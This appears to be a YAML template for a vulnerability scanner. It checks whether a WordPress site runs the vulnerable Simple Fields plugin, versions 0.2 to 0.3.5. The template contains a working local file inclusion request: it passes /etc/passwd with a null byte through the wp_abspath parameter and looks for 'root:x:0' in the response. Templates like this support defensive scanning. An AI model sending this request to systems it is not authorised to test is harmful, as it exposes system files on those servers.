product: WordPress
vName: WordPress Simple Fields 0.2 - 0.3.5 LFI-RFI-RCE
type: 文件读取
vID: [ ]
level: 3
vDesc: WordPress Simple Fields 0.2 is vulnerable to local file inclusion, remote file
  inclusion, and remote code execution.
version: ''
note: ''
search: { }
protocol: http
link: https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00
    verify:
      logic: and
      check:
        - body:
            value:
              - 'root:x:0'
            logic: and
